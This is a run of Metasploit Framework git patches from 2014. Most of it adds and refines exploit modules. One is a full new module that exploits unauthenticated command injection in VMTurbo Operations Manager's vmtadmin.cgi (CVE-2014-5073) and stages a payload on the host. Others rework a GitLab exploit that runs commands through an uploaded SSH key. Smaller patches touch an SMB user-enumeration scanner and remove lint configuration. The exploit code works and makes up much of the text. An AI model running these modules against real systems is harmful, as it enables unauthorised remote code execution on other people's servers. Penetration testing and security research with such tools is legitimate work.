+      ptr = 'V'
     end
 
-    results = session.railgun.psapi.EnumDeviceDrivers(0, 0, ptr_size)
+    results = session.railgun.psapi.EnumDeviceDrivers(0, 0, session.railgun.util.pointer_size)
     unless results['return']
       print_error("EnumDeviceDrivers failed (error: #{results['GetLastError']} #{results['ErrorMessage']})")
       return nil
     end
-    results = session.railgun.psapi.EnumDeviceDrivers(results['lpcbNeeded'], results['lpcbNeeded'], ptr_size)
+    results = session.railgun.psapi.EnumDeviceDrivers(results['lpcbNeeded'], results['lpcbNeeded'], session.railgun.util.pointer_size)
     unless results['return']
       print_error("EnumDeviceDrivers failed (error: #{results['GetLastError']} #{results['ErrorMessage']})")
       return nil
     end
-    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack((ptr_size == 4 ? 'V' : 'Q') + '*')
+    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("#{ptr}*")
 
     addresses.each do |address|
       results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)

From a995bcf2ef0ee00b78ec072a8b88cc536c6f730e Mon Sep 17 00:00:00 2001
From: kaospunk <github@bmkdirect.com>
Date: Sun, 10 Aug 2014 19:53:33 -0400
Subject: [PATCH 271/321] Fix URI building and failure cases

This update uses the normalize_uri method for building
URIs. Additionally, failure cases have been modified
for a less generic version.
---
 .../exploits/multi/http/gitlab_shell_exec.rb  | 46 +++++++++----------
 1 file changed, 22 insertions(+), 24 deletions(-)

diff --git a/modules/exploits/multi/http/gitlab_shell_exec.rb b/modules/exploits/multi/http/gitlab_shell_exec.rb
index 836beb8044..17178af856 100644
--- a/modules/exploits/multi/http/gitlab_shell_exec.rb
+++ b/modules/exploits/multi/http/gitlab_shell_exec.rb
@@ -69,6 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
+    login
     if target.name == 'Unix (CMD)'
       execute_command(payload.encoded)
     else
@@ -77,15 +78,14 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, _opts = {})
-    session_cookie = login
-    key_id = add_key(session_cookie, cmd)
-    delete_key(session_cookie, key_id)
+    key_id = add_key(cmd)
+    delete_key(key_id)
   end
 
   def login
     username = datastore['USERNAME']
     password = datastore['PASSWORD']
-    signin_page = datastore['TARGETURI'] + 'users/sign_in'
+    signin_page = normalize_uri(datastore['TARGETURI'], 'users', 'sign_in')
 
     # Get a valid session cookie and authenticity_token for the next step
     res = send_request_cgi(
@@ -94,15 +94,15 @@ class Metasploit3 < Msf::Exploit::Remote
                             'uri'    => signin_page
     )
 
-    fail_with(Failure::Unknown, "#{peer} - Connection timed out during login") unless res
+    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during login") unless res
 
-    session_cookie = res.get_cookies.scan(/(_gitlab_session=[a-z0-9]+)/).flatten[0] || ''
+    local_session_cookie = res.get_cookies.scan(/(_gitlab_session=[a-z0-9]+)/).flatten[0] || ''
     auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]
 
     # Perform the actual login and get the newly assigned session cookie
     res = send_request_cgi(
                             'method' => 'POST',
-                            'cookie' => session_cookie,
+                            'cookie' => local_session_cookie,
                             'uri'    => signin_page,
                             'vars_post' =>
                               {
@@ -116,23 +116,21 @@ class Metasploit3 < Msf::Exploit::Remote
 
     fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res
 
-    session_cookie = res.get_cookies.scan(/(_gitlab_session=[a-z0-9]+)/).flatten[0]
-
-    session_cookie
+    @session_cookie = res.get_cookies.scan(/(_gitlab_session=[a-z0-9]+)/).flatten[0]
   end
 
-  def add_key(session_cookie, cmd)
-    add_key_base = datastore['TARGETURI'] + 'profile/keys'
+  def add_key(cmd)
+    add_key_base = normalize_uri(datastore['TARGETURI'], 'profile', 'keys')
 
     # Perform an initial request to get an authenticity_token so the actual
     # key addition can be done successfully.
     res = send_request_cgi(
                             'method' => 'GET',
-                            'cookie' => "request_method=GET; #{session_cookie}",
-                            'uri'    => add_key_base + '/new'
+                            'cookie' => "request_method=GET; #{@session_cookie}",
+                            'uri'    => normalize_uri(add_key_base, 'new')
     )
 
-    fail_with(Failure::Unknown, "#{peer} - Connection timed out during request") unless res
+    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
 
     auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]
     title = rand_text_alphanumeric(16)
@@ -150,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     res = send_request_cgi(
                             'method' => 'POST',
-                            'cookie' => "request_method=GET; #{session_cookie}",
+                            'cookie' => "request_method=GET; #{@session_cookie}",
                             'uri'    => add_key_base,
                             'vars_post' =>
                               {
@@ -161,7 +159,7 @@ class Metasploit3 < Msf::Exploit::Remote
                               }
                           )
 
-    fail_with(Failure::Unknown, "#{peer} - Request to add key failed") unless res
+    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
 
     # Get the newly added key id so it can be used for cleanup
     key_id = res.headers['Location'].split('/')[-1]
@@ -169,24 +167,24 @@ class Metasploit3 < Msf::Exploit::Remote
     key_id
   end
 
-  def delete_key(session_cookie, key_id)
-    key_base = datastore['TARGETURI'] + 'profile/keys'
+  def delete_key(key_id)
+    key_base = normalize_uri(datastore['TARGETURI'], 'profile', 'keys')
 
     res = send_request_cgi(
                              'method' => 'GET',
-                             'cookie' => "request_method=GET; #{session_cookie}",
+                             'cookie' => "request_method=GET; #{@session_cookie}",
                              'uri'    => key_base
                            )
 
-    fail_with(Failure::Unknown, "#{peer} - Connection timed out during request") unless res
+    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
 
     auth_token = res.body.scan(/<meta content="(.*?)" name="csrf-token"/).flatten[0]
 
     # Remove the key which was added to clean up after ourselves
     res = send_request_cgi(
                              'method' => 'POST',
-                             'cookie' => "#{session_cookie}",
-                             'uri'    => "#{key_base}/#{key_id}",
+                             'cookie' => "#{@session_cookie}",
+                             'uri'    => normalize_uri("#{key_base}", "#{key_id}"),
                              'vars_post' =>
                              {
                                '_method' => 'delete',
@@ -194,6 +192,6 @@ class Metasploit3 < Msf::Exploit::Remote
                              }
                            )
 
-    fail_with(Failure::Unknown, "#{peer} - Request to delete key failed") unless res
+    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
   end
 end

From 0138f3648d853b7d00cd700951436e38b547ce66 Mon Sep 17 00:00:00 2001
From: Emilio Pinna <emilio.pinn@gmail.com>
Date: Mon, 11 Aug 2014 16:57:39 +0200
Subject: [PATCH 272/321] Add VMTurbo Operations Manager 'vmtadmin.cgi' Remote
 Command Execution module.

---
 .../unix/http/vmturbo_vmtadmin_exec_noauth.rb | 222 ++++++++++++++++++
 1 file changed, 222 insertions(+)
 create mode 100644 modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb

diff --git a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
new file mode 100644
index 0000000000..30eb80e1bd
--- /dev/null
+++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
@@ -0,0 +1,222 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'VMTurbo Operations Manager 4.6 vmtadmin.cgi Remote Command Execution',
+      'Description' => %q{
+          VMTurbo Operations Manager 4.6 and prior are vulnerable to unauthenticated
+          OS Command injection in the web interface. Use reverse payloads for the most
+          reliable results. Since it is a blind OS command injection vulnerability,
+          there is no output for the executed command when using the cmd generic payload.
+          Port binding payloads are disregarded due to the restrictive firewall settings.
+
+          This module has been tested successfully on VMTurbo Operations Manager 4.5 and
+          VMTurbo Operations Manager 4.6.
+      },
+      'Author'      =>
+        [
+          'Emilio Pinna, Secunia Research <emilio.pinn@gmail.com>', # Vulnerability discovery and Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+            ['CVE', '2014-5073'],
+            ['OSVDB', '109572'],
+            ['URL', 'http://secunia.com/secunia_research/2014-8/']
+        ],
+      'DisclosureDate' => 'Jun 25 2014',
+      'Privileged'     => false,
+      'Platform'       => %w{ linux unix },
+      'Payload'        =>
+        {
+          'Compat'   =>
+          {
+            'ConnectionType' => '-bind'
+          }
+        },
+      'Targets'        =>
+      [
+        [ 'Unix CMD',
+          {
+            'Arch' => ARCH_CMD,
+            'Platform' => 'unix'
+          }
+        ],
+        [ 'VMTurbo Operations Manager',
+          {
+          'Arch' => [ ARCH_X86, ARCH_X86_64 ],
+          'Platform' => 'linux'
+          }
+        ],
+      ],
+      'DefaultTarget'  => 1
+      ))
+  end
+
+  def check
+  begin
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => "/cgi-bin/vmtadmin.cgi",
+      'vars_get' => {
+        "callType" => "ACTION",
+        "actionType" => "VERSIONS"
+      }
+    })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+      print_error("#{rhost}:#{rport} - Failed to connect to the web server")
+      return Exploit::CheckCode::Unknown
+  end
+
+  if res and res.code == 200 and res.body =~ /vmtbuild:([\d]+),vmtrelease:([\d.]+),vmtbits:[\d]+,osbits:[\d]+/
+    version = $2
+    build = $1
+
+    print_status("#{peer} - VMTurbo Operations Manager version #{version} build #{build} detected")
+    else
+      print_status("#{peer} - Unexpected vmtadmin.cgi response")
+      return Exploit::CheckCode::Unknown
+    end
+
+    if version and version <= "4.6"
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def request(cmd)
+    begin
+    res = send_request_cgi({
+      'uri'    => '/cgi-bin/vmtadmin.cgi',
+      'method' => 'GET',
+      'vars_get' => {
+        "callType" => "DOWN",
+        "actionType" => "CFGBACKUP",
+        "fileDate" => "\"`#{cmd}`\""
+      }
+    })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+      print_error("#{rhost}:#{rport} - Failed to connect to the web server")
+      return nil
+    end
+    vprint_status("Sent command #{cmd}")
+    res
+  end
+
+
+  def unix_stager(data)
+
+    file_name = "/tmp/#{rand_text_alphanumeric(4+rand(4))}"
+
+    File.open(file_name, 'wb') { |f| f.write(data) }
+    unix_upload(file_name, data)
+    @to_delete = file_name
+
+    request("/bin/chmod +x #{file_name}")
+    request("#{file_name}&")
+  end
+
+  def unix_upload(file_name, data, append=false)
+    # This file uploader is used as early stager and follows the core
+    # function _write_file_unix_shell() in lib/msf/core/post/file.rb
+
+    redirect = (append ? '>>' : '>')
+
+    # Short-circuit an empty string. The : builtin is part of posix
+    # standard and should theoretically exist everywhere.
+    if data.length == 0
+      request(": #{redirect} #{file_name}")
+      return
+    end
+
+    d = data.dup
+    d.force_encoding('binary') if d.respond_to? :force_encoding
+
+    chunks = []
+    command = nil
+    cmd_name = ''
+
+    # Conservative.
+    line_max = 512
+    # Leave plenty of room for the filename we're writing to and the
+    # command to echo it out
+    line_max -= file_name.length
+    line_max -= 64
+
+    command = %q(/usr/bin/printf 'CONTENTS')
+
+    # each byte will balloon up to 4 when we encode
+    # (A becomes \x41 or \101)
+    max = line_max / 4
+
+    i = 0
+    while i < d.length
+      slice = d.slice(i...(i + max))
+      chunks << Rex::Text.to_octal(slice)
+      i += max
+    end
+
+    print_status("Sending payload to #{file_name} writing #{d.length} bytes in #{chunks.length} chunks of #{chunks.first.length} bytes")
+
+    # The first command needs to use the provided redirection for either
+    # appending or truncating.
+    cmd = command.sub('CONTENTS') { chunks.shift }
+    request("#{cmd} #{redirect} '#{file_name}'")
+
+    # After creating/truncating or appending with the first command, we
+    # need to append from here on out.
+    chunks.each { |chunk|
+      vprint_status("Next chunk is #{chunk.length} bytes")
+      cmd = command.sub('CONTENTS') { chunk }
+
+      request("#{cmd} >> '#{file_name}'")
+    }
+    true
+  end
+
+  def exploit
+
+    #
+    # Handle single command shot
+    #
+    if target.name =~ /CMD/
+      cmd = payload.encoded
+      res = request(cmd)
+
+      unless res
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
+      end
+
+      print_status("#{rhost}:#{rport} - Blind Exploitation - unknown exploitation state")
+      return
+    end
+
+    @pl = generate_payload_exe
+
+    unless @pl
+      fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Please set payload before to run exploit.")
+      return
+    end
+
+    unix_stager(@pl)
+  end
+
+  def on_new_session(client)
+    return unless defined? @to_delete
+
+    print_warning("Deleting #{@to_delete} payload file")
+    request("/bin/rm #{@to_delete}")
+  end
+end

From c97cd75beb2bd67313132b43dec7813ff51c0832 Mon Sep 17 00:00:00 2001
From: Emilio Pinna <emilio.pinn@gmail.com>
Date: Mon, 11 Aug 2014 18:52:21 +0200
Subject: [PATCH 273/321] Rephrase 'Author' section

---
 modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
index 30eb80e1bd..4e77dc91e6 100644
--- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
+++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
@@ -26,7 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'      =>
         [
-          'Emilio Pinna, Secunia Research <emilio.pinn@gmail.com>', # Vulnerability discovery and Metasploit module
+          # Secunia Research - Discovery and Metasploit module
+          'Emilio Pinna <emilio.pinn[at]gmail.com>'
         ],
       'License'     => MSF_LICENSE,
       'References'  =>

From 4b4b24b79d6341df6a6c938f694f91d3f9d31d63 Mon Sep 17 00:00:00 2001
From: Emilio Pinna <emilio.pinn@gmail.com>
Date: Mon, 11 Aug 2014 18:54:43 +0200
Subject: [PATCH 274/321] Fix errors printing

---
 .../exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
index 4e77dc91e6..8a96fe0e8f 100644
--- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
+++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
       }
     })
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("#{rhost}:#{rport} - Failed to connect to the web server")
+      vprint_error("#{peer} - Failed to connect to the web server")
       return Exploit::CheckCode::Unknown
   end
 
@@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
       }
     })
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("#{rhost}:#{rport} - Failed to connect to the web server")
+      vprint_error("#{peer} - Failed to connect to the web server")
       return nil
     end
     vprint_status("Sent command #{cmd}")
@@ -197,17 +197,17 @@ class Metasploit3 < Msf::Exploit::Remote
       res = request(cmd)
 
       unless res
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
+        fail_with(Failure::Unknown, "#{peer} - Unable to execute payload")
       end
 
-      print_status("#{rhost}:#{rport} - Blind Exploitation - unknown exploitation state")
+      print_status("#{peer} - Blind Exploitation - unknown exploitation state")
       return
     end
 
     @pl = generate_payload_exe
 
     unless @pl
-      fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Please set payload before to run exploit.")
+      fail_with(Failure::BadConfig, "#{peer} - Please set payload before to run exploit.")
       return
     end
 

From ac526ca9bd1328b4644bddd2f949bf603653f388 Mon Sep 17 00:00:00 2001
From: Emilio Pinna <emilio.pinn@gmail.com>
Date: Mon, 11 Aug 2014 18:58:11 +0200
Subject: [PATCH 275/321] Fix print_* to vprint_* in check method

---
 modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
index 8a96fe0e8f..24ef28cb7c 100644
--- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
+++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
@@ -84,9 +84,9 @@ class Metasploit3 < Msf::Exploit::Remote
     version = $2
     build = $1
 
-    print_status("#{peer} - VMTurbo Operations Manager version #{version} build #{build} detected")
+    vprint_status("#{peer} - VMTurbo Operations Manager version #{version} build #{build} detected")
     else
-      print_status("#{peer} - Unexpected vmtadmin.cgi response")
+      vprint_status("#{peer} - Unexpected vmtadmin.cgi response")
       return Exploit::CheckCode::Unknown
     end
 

From 4790b18424b195746283ef135c8a3a6ce13fa0b3 Mon Sep 17 00:00:00 2001
From: Emilio Pinna <emilio.pinn@gmail.com>
Date: Mon, 11 Aug 2014 19:02:09 +0200
Subject: [PATCH 276/321] Use FileDropper mixin to delete uploaded file

---
 .../exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb | 10 ++--------
 1 file changed, 2 insertions(+), 8 deletions(-)

diff --git a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
index 24ef28cb7c..c9cedf51a8 100644
--- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
+++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
@@ -10,6 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(update_info(info,
@@ -123,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     File.open(file_name, 'wb') { |f| f.write(data) }
     unix_upload(file_name, data)
-    @to_delete = file_name
+    register_file_for_cleanup(file_name)
 
     request("/bin/chmod +x #{file_name}")
     request("#{file_name}&")
@@ -213,11 +214,4 @@ class Metasploit3 < Msf::Exploit::Remote
 
     unix_stager(@pl)
   end
-
-  def on_new_session(client)
-    return unless defined? @to_delete
-
-    print_warning("Deleting #{@to_delete} payload file")
-    request("/bin/rm #{@to_delete}")
-  end
 end

From cc5770558dbf4412f897d9f2feb16e4899f37e90 Mon Sep 17 00:00:00 2001
From: Emilio Pinna <emilio.pinn@gmail.com>
Date: Mon, 11 Aug 2014 19:16:14 +0200
Subject: [PATCH 277/321] Remove local payload saving used for debugging

---
 modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb | 1 -
 1 file changed, 1 deletion(-)

diff --git a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
index c9cedf51a8..1504d67375 100644
--- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
+++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
@@ -122,7 +122,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
     file_name = "/tmp/#{rand_text_alphanumeric(4+rand(4))}"
 
-    File.open(file_name, 'wb') { |f| f.write(data) }
     unix_upload(file_name, data)
     register_file_for_cleanup(file_name)
 

From 4e6a04d3ad0039a8512b0fdd1defe769a60e135f Mon Sep 17 00:00:00 2001
From: kaospunk <github@bmkdirect.com>
Date: Mon, 11 Aug 2014 19:54:10 -0400
Subject: [PATCH 278/321] Modifications for login and key addition

This commit adds additional support for logging in
on multiple versions of Gitlab as well as adding a
key to exploit the vulnerability.
---
 .../exploits/multi/http/gitlab_shell_exec.rb  | 30 ++++++++++++-------
 1 file changed, 20 insertions(+), 10 deletions(-)

diff --git a/modules/exploits/multi/http/gitlab_shell_exec.rb b/modules/exploits/multi/http/gitlab_shell_exec.rb
index 17178af856..ecbf41dfbe 100644
--- a/modules/exploits/multi/http/gitlab_shell_exec.rb
+++ b/modules/exploits/multi/http/gitlab_shell_exec.rb
@@ -96,9 +96,17 @@ class Metasploit3 < Msf::Exploit::Remote
 
     fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during login") unless res
 
-    local_session_cookie = res.get_cookies.scan(/(_gitlab_session=[a-z0-9]+)/).flatten[0] || ''
+    local_session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]
     auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]
 
+    if res.body.include? 'user[email]'
+      @gitlab_version = 5
+      user_field = 'user[email]'
+    else
+      @gitlab_version = 7
+      user_field = 'user[login]'
+    end
+
     # Perform the actual login and get the newly assigned session cookie
     res = send_request_cgi(
                             'method' => 'POST',
@@ -108,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote
                               {
                                 'utf8' => "\xE2\x9C\x93",
                                 'authenticity_token' => auth_token,
-                                'user[login]' => username,
+                                "#{user_field}" => username,
                                 'user[password]' => password,
                                 'user[remember_me]' => 0
                               }
@@ -116,18 +124,22 @@ class Metasploit3 < Msf::Exploit::Remote
 
     fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res
 
-    @session_cookie = res.get_cookies.scan(/(_gitlab_session=[a-z0-9]+)/).flatten[0]
+    @session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]
   end
 
   def add_key(cmd)
-    add_key_base = normalize_uri(datastore['TARGETURI'], 'profile', 'keys')
+    if @gitlab_version == 5
+      @key_base = normalize_uri(datastore['TARGETURI'], 'keys')
+    else
+      @key_base = normalize_uri(datastore['TARGETURI'], 'profile', 'keys')
+    end
 
     # Perform an initial request to get an authenticity_token so the actual
     # key addition can be done successfully.
     res = send_request_cgi(
                             'method' => 'GET',
                             'cookie' => "request_method=GET; #{@session_cookie}",
-                            'uri'    => normalize_uri(add_key_base, 'new')
+                            'uri'    => normalize_uri(@key_base, 'new')
     )
 
     fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
@@ -149,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote
     res = send_request_cgi(
                             'method' => 'POST',
                             'cookie' => "request_method=GET; #{@session_cookie}",
-                            'uri'    => add_key_base,
+                            'uri'    => @key_base,
                             'vars_post' =>
                               {
                                 'utf8' => "\xE2\x9C\x93",
@@ -168,12 +180,10 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def delete_key(key_id)
-    key_base = normalize_uri(datastore['TARGETURI'], 'profile', 'keys')
-
     res = send_request_cgi(
                              'method' => 'GET',
                              'cookie' => "request_method=GET; #{@session_cookie}",
-                             'uri'    => key_base
+                             'uri'    => @key_base
                            )
 
     fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
@@ -184,7 +194,7 @@ class Metasploit3 < Msf::Exploit::Remote
     res = send_request_cgi(
                              'method' => 'POST',
                              'cookie' => "#{@session_cookie}",
-                             'uri'    => normalize_uri("#{key_base}", "#{key_id}"),
+                             'uri'    => normalize_uri("#{@key_base}", "#{key_id}"),
                              'vars_post' =>
                              {
                                '_method' => 'delete',

From 4aeb1eda9c1db44d73575f7dc856df76eacf5571 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 11 Aug 2014 18:55:32 -0500
Subject: [PATCH 279/321] Don't use datastore options as default values

---
 modules/auxiliary/scanner/smb/smb_enumusers.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/auxiliary/scanner/smb/smb_enumusers.rb b/modules/auxiliary/scanner/smb/smb_enumusers.rb
index e43116600e..c9d6978bf8 100644
--- a/modules/auxiliary/scanner/smb/smb_enumusers.rb
+++ b/modules/auxiliary/scanner/smb/smb_enumusers.rb
@@ -34,11 +34,11 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def rport
-    @rport || datastore['RPORT']
+    @rport
   end
 
   def smb_direct
-    @smbdirect || datastore['SMBDirect']
+    @smbdirect
   end
 
   # Locate an available SMB PIPE for the specified service

From f71589f534bbf4b0bdb62db850b4b0d1b1394ebc Mon Sep 17 00:00:00 2001
From: Emilio Pinna <emilio.pinn@gmail.com>
Date: Tue, 12 Aug 2014 10:49:17 +0200
Subject: [PATCH 280/321] Simplify payload upload using 'CmdStager' mixin

---
 .../unix/http/vmturbo_vmtadmin_exec_noauth.rb | 93 ++-----------------
 1 file changed, 8 insertions(+), 85 deletions(-)

diff --git a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
index 1504d67375..41a0d9743f 100644
--- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
+++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
@@ -9,8 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::EXE
-  include Msf::Exploit::FileDropper
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -64,6 +63,8 @@ class Metasploit3 < Msf::Exploit::Remote
       ],
       'DefaultTarget'  => 1
       ))
+
+    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
   end
 
   def check
@@ -98,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
   end
 
-  def request(cmd)
+  def execute_command(cmd, opts)
     begin
     res = send_request_cgi({
       'uri'    => '/cgi-bin/vmtadmin.cgi',
@@ -113,88 +114,16 @@ class Metasploit3 < Msf::Exploit::Remote
       vprint_error("#{peer} - Failed to connect to the web server")
       return nil
     end
+
     vprint_status("Sent command #{cmd}")
-    res
-  end
-
-
-  def unix_stager(data)
-
-    file_name = "/tmp/#{rand_text_alphanumeric(4+rand(4))}"
-
-    unix_upload(file_name, data)
-    register_file_for_cleanup(file_name)
-
-    request("/bin/chmod +x #{file_name}")
-    request("#{file_name}&")
-  end
-
-  def unix_upload(file_name, data, append=false)
-    # This file uploader is used as early stager and follows the core
-    # function _write_file_unix_shell() in lib/msf/core/post/file.rb
-
-    redirect = (append ? '>>' : '>')
-
-    # Short-circuit an empty string. The : builtin is part of posix
-    # standard and should theoretically exist everywhere.
-    if data.length == 0
-      request(": #{redirect} #{file_name}")
-      return
-    end
-
-    d = data.dup
-    d.force_encoding('binary') if d.respond_to? :force_encoding
-
-    chunks = []
-    command = nil
-    cmd_name = ''
-
-    # Conservative.
-    line_max = 512
-    # Leave plenty of room for the filename we're writing to and the
-    # command to echo it out
-    line_max -= file_name.length
-    line_max -= 64
-
-    command = %q(/usr/bin/printf 'CONTENTS')
-
-    # each byte will balloon up to 4 when we encode
-    # (A becomes \x41 or \101)
-    max = line_max / 4
-
-    i = 0
-    while i < d.length
-      slice = d.slice(i...(i + max))
-      chunks << Rex::Text.to_octal(slice)
-      i += max
-    end
-
-    print_status("Sending payload to #{file_name} writing #{d.length} bytes in #{chunks.length} chunks of #{chunks.first.length} bytes")
-
-    # The first command needs to use the provided redirection for either
-    # appending or truncating.
-    cmd = command.sub('CONTENTS') { chunks.shift }
-    request("#{cmd} #{redirect} '#{file_name}'")
-
-    # After creating/truncating or appending with the first command, we
-    # need to append from here on out.
-    chunks.each { |chunk|
-      vprint_status("Next chunk is #{chunk.length} bytes")
-      cmd = command.sub('CONTENTS') { chunk }
-
-      request("#{cmd} >> '#{file_name}'")
-    }
-    true
   end
 
   def exploit
 
-    #
     # Handle single command shot
-    #
     if target.name =~ /CMD/
       cmd = payload.encoded
-      res = request(cmd)
+      res = execute_command(cmd)
 
       unless res
         fail_with(Failure::Unknown, "#{peer} - Unable to execute payload")
@@ -204,13 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote
       return
     end
 
-    @pl = generate_payload_exe
-
-    unless @pl
-      fail_with(Failure::BadConfig, "#{peer} - Please set payload before to run exploit.")
-      return
-    end
-
-    unix_stager(@pl)
+    # Handle payload upload using CmdStager mixin
+    execute_cmdstager({:flavor => :printf})
   end
 end

From 47cb90640855a8bea0cf012bd668d61303b182f3 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Tue, 12 Aug 2014 10:37:58 -0500
Subject: [PATCH 281/321] Remove rubocop and msftidy touchpoints

Rubocop replaces the default YAML library which makes development
testing difficult. It does not cause problems on Travis, but according
to reports, it does cause instability with many individual dev
environments.

While I would love to have a more solid source of this bug report, right
now this was an oral report from @shuckins-r7 (who I tend to believe a
lot).
---
 .rubocop.yml      |  58 ----
 .rubocop_todo.yml | 730 ----------------------------------------------
 Gemfile           |   2 -
 tools/msftidy.rb  |  10 -
 4 files changed, 800 deletions(-)
 delete mode 100644 .rubocop.yml
 delete mode 100644 .rubocop_todo.yml

diff --git a/.rubocop.yml b/.rubocop.yml
deleted file mode 100644
index 5ab3b803db..0000000000
--- a/.rubocop.yml
+++ /dev/null
@@ -1,58 +0,0 @@
-# This list was created by analyzing the last three months (51 modules)
-# committed to Metasploit Framework. Many, many older modules will have
-# offenses, but this should at least provide a baseline for new modules.
-#
-# Updates to this file should include a 'Description' parameter for
-# any explaination needed.
-
